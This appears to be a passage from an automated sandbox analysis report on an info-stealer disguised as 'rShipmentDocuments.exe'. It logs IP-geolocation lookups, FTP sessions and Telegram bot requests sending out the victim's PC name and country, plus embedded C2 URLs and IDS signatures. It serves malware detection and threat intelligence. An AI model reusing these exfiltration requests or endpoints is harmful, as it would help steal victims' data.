                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.4:49205 -> 185.230.141.85:49693
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: HostingvpsvilleruRU HostingvpsvilleruRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: unknownFTP traffic detected: 185.230.141.85:21 -> 192.168.2.4:49204 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 185.230.141.85
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 11 Oct 2024 07:35:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 11 Oct 2024 07:35:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000031E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4153230560.00000000068E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c62
                Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1765638038.0000000002867000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000000.00000002.1732739844.0000000005DA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enp
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003256000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/p
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
